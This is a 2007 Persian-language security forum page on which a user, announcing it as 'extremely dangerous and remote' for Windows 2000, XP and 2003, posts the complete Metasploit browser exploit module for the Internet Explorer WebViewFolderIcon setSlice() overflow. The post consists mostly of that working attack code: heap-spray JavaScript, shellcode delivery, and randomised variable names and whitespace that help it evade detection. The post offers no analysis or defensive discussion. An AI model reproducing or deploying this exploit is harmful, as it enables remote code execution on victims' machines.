كارت dvb , كارت دي وي بي , دی وی بی , رسيور , رسیور

فروشگاه سايت

تبليغات

آخرين ارسالي‌هاي آموزش ها و مفاهیم پایه

Microsoft Windows Shell Code Execution Vulnerability

اين يك بخش از موضوع Microsoft Windows Shell Code Execution Vulnerability است كه در انجمن آموزش ها و مفاهیم پایه مطرح گرديده و اين انجمن نيز زير مجموعه‌ي تالار هاي امنيتي است: فوق العاده خطرناک و ریموت هم هستش اینم ساپورتشه و تمام ورژنهای ویندوز 2000 و xp و 2003 اینم اکسپلویتش کد: # This module is part of the metasploit framework3 # svn co http://metasploit.com/svn/framework3/trunk/require 'msf/core'module Msfclass Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer ...

 

بازگشت   انجمن های آموزشی پارس > تالار هاي امنيتي > آموزش ها و مفاهیم پایه


آموزش ها و مفاهیم پایه اینجا در مورد مفاهیم پایه ای صحبت میشه و سوالات در مورد اصطلاحات و پیش زمینه ها و اموزش ان ها اینجا مطرح می شه

اطلاعيه‌هاي سايت

 

لطفاً پيش از فعاليت در سايت، قوانين سايت را مطالعه نماييد

كليه‌ي كاربراني كه توانايي مديريت هر يك از بخش‌هاي سايت را دارند، با كليك روي اين لينك به مديريت سايت اطلاع دهند


پاسخ

 

LinkBack ابزارهای موضوع
قدیمی Saturday 24 March 2007, 12:10 PM   #1
عضو نیمه فعال
 
!!SPY!! آواتار ها
 

تاریخ عضویت: March 13th, 2007
نوشته ها: 111

سطح دانش: 9 [♥ Bé-Yêu ♥]
سابقه در سایت: 0 / 213
قابليت: 37 / 1445
ميزان تجربه: 55%

Thanks: 7
Thanked 48 Times in 31 Posts
قدرت اعتبار: 3 !!SPY!! is on a distinguished road
Smile Microsoft Windows Shell Code Execution Vulnerability

فوق العاده خطرناک و ریموت هم هستش
اینم ساپورتشه
و تمام ورژنهای ویندوز 2000 و xp و 2003

اینم اکسپلویتش

کد:
 
 
  
 
 
 
 # This module is part of the metasploit framework3 # svn co http://metasploit.com/svn/framework3/trunk/require 'msf/core'module Msfclass Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote    include Exploit::Remote::HttpServer::Html    def initialize(info = {})        super(update_info(info,            'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',            'Description'    => %q{                This module exploits a flaw in the WebViewFolderIcon ActiveX control            included with Windows 2000, Windows XP, and Windows 2003. This flaw was published            during the Month of Browser Bugs project (MoBB #18).            },            'License'        => MSF_LICENSE,            'Author'         =>                 [                     'hdm',                 ],            'Version'        => '$Revision: 3783 $',            'References'     =>                 [                    [ 'OSVDB', '27110' ],                    [ 'BID', '19030' ],                    [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]                ],            'Payload'        =>                {                    'Space'          => 1024,                    'BadChars'       => "\x00",                    },            'Platform'       => 'win',            'Targets'        =>                [                    ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]                ],            'DefaultTarget'  => 0))    end    def autofilter        false    end        def on_request_uri(cli, request)        # Re-generate the payload        return if ((p = regenerate_payload(cli)) == nil)        # Encode the shellcode        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))                # Get a unicode friendly version of the return address        addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]        # Randomize the javascript variable names            var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)        var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)        var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)        var_x         = Rex::Text.rand_text_alpha(rand(30)+2)        var_i         = Rex::Text.rand_text_alpha(rand(30)+2)        var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)        var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)                # Randomize HTML data        html          = Rex::Text.rand_text_alpha(rand(30)+2)                # Build out the message        ******* = %Q|<html><head>    <******>    try {        var #{var_unescape}  = unescape ;    var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;        var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;    while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;    var #{var_x} = new Array() ;        for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {        #{var_x}[ #{var_i} ] =             #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +            #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +             #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +                     #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;    }               for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {        var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );            try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }        var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );    }        } catch( e ) { window.location = 'about:blank' ; }        </******></head><body>#{html}</body></html>                |        # Randomize the whitespace in the document        *******.gsub!(/\s+/) do |s|            len = rand(100)+2            set = "\x09\x20\x0d\x0a"            buf = ''                        while (buf.length < len)                buf << set[rand(set.length)].chr            end                        buf        end                print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")        # Transmit the response to the client        send_response(cli, *******)    endendend
View !!SPY!!'s Photo Album !!SPY!! آفلاين است   پاسخ با نقل قول
پاسخ

برچسب ها
vulnerability , execution , code , shell , windows , microsoft

ابزارهای موضوع

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code is فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال


موضوعات مشابه

موضوع نویسنده موضوع انجمن پاسخ ها آخرين نوشته
كدهاي بعضي بازيهاي 2006 !!كامپيوتر Mr.Milad بازیهای کامپیوتر 2 Tuesday 20 March 2007 09:30 AM
Microsoft .NET Framework 3.0.04506.03 Pre-Release Raminmetal معرفی جدیدترین نرم افزار‌ها 0 Tuesday 26 September 2006 01:28 AM
AutoPatcher 2003 August 2006 Update براي ويندوز Raminmetal مباحث ویندوز (Windows) 0 Monday 14 August 2006 12:55 AM
Windows Live™ Messenger behzad1363 معرفي نرم افزارهاي كاربردي 0 Thursday 27 July 2006 03:44 PM


اکنون ساعت 08:35 AM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.


Powered by vBulletin
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.

Skin developed by: ParsDVB


نقل مطالب سايت با ذکر منبع (http://drdvb.com) و نام نويسنده مجاز است. مسئوليت پستها بر عهده نويسنده آن است و سايت parsdvb به هيچ عنوان در قبال نوشته‌های ديگران مسئوليتی ندارد.
 

تمامي قوانين اين سايت از جمهوري اسلامي ايران پيروي مي کند و هرگونه مطالب مخالف قوانين ايران و بنر يا لينک مستهجن در اين سايت جايي ندارد

website monitoring service check web page

    

100
Search 2

parsdvb satdw skynet skynet جدید skystar3 tps.bin vplug vplug جدید vpnمجانی zeeaflam آموزش لب گرفتن استارست اموزش لب گرفتن انتخاب رشته مجازي ترانه ی مادری ثبت نام فيات ثبت نام فیات حسین استیری دانلود نرم افزار ویروس ساز دانلود ويروس ساز رضایا ساسي مانكن ساسی مانکن سریال ترانه ی مادری عکس دختر عکس لب عکس لب گرفتن فركانس شبكه هاي استاني فركانس ماهواره فرکانس فرکانس شبکه های استانی فرکانس ماهواره فرکانسهای ماهواره فيات فيات سينا فیات فیات سینا لب لب گرفتن مجله تپش منصور حیدری مولتی ویژن همسر خسرو شكيبايي همسر خسرو شکیبایی پخش افتتاحیه المپیک پخش المپیک پخش زنده ماهواره پوریا شکیبایی کانالهای پخش المپیک یاسر محمودی ... powered by Search 2
Google
جستجو در گوگل جستجو درانجمنهای آموزشی پارس